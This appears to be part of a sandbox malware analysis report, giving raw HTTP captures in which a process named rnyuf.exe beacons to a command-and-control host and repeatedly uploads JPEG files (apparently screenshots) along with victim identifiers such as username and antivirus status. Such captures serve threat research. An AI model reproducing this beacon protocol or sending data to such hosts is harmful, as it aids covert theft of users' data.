                          337192.168.2.450164178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.907134056 CET15714OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:23.907504082 CET15715OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:23.907520056 CET15725OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:23.907634974 CET15727OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:23.929831982 CET15730OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:23.929891109 CET15738OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:23.929908037 CET15744OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:23.930027008 CET15748OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:23.930042982 CET15750OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:23.930058002 CET15753OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:23.952332020 CET15756OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:24.384676933 CET15823INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:24 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          338192.168.2.450165178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:24.966933966 CET15825OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:24.992595911 CET15825INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:24 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          339192.168.2.450166178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:28.201198101 CET15826OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:28.226656914 CET15839INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          34192.168.2.449818178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.298165083 CET4005OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:30.324439049 CET4006INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          340192.168.2.450167178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:28.217946053 CET15826OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:28.218050957 CET15826OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:28.218266010 CET15836OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:28.218400955 CET15839OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:28.240617037 CET15842OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:28.240658045 CET15850OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:28.240679026 CET15853OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:28.240724087 CET15858OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:28.240854979 CET15863OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:28.240866899 CET15865OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:28.263094902 CET15868OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:28.310971022 CET15936INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:24:28.333106995 CET15936OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:28.359719992 CET15937INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          341192.168.2.450168178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:28.498806953 CET15938OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:28.524260044 CET15938INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          342192.168.2.450169178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:28.655658960 CET15939OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:28.680962086 CET15939INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          343192.168.2.450170178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:28.928795099 CET15940OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:28.955473900 CET15940INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          344192.168.2.450171178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:29.266880989 CET15941OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:29.297665119 CET15941INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:29 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          345192.168.2.450174178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:29.459811926 CET15943OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:29.459916115 CET15944OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:29.460105896 CET15954OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:29.460241079 CET15956OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:29.484323025 CET16017OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:29.508343935 CET16149OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
